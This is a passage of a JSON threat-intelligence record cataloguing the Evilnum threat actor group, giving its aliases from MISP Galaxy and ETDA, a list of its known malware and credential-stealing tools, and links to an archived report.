			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446554,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/961ec3471b76aebe71c37d7de01be49ce7149179.pdf",
		"text": "https://archive.orkl.eu/961ec3471b76aebe71c37d7de01be49ce7149179.txt",
		"img": "https://archive.orkl.eu/961ec3471b76aebe71c37d7de01be49ce7149179.jpg"
	}
}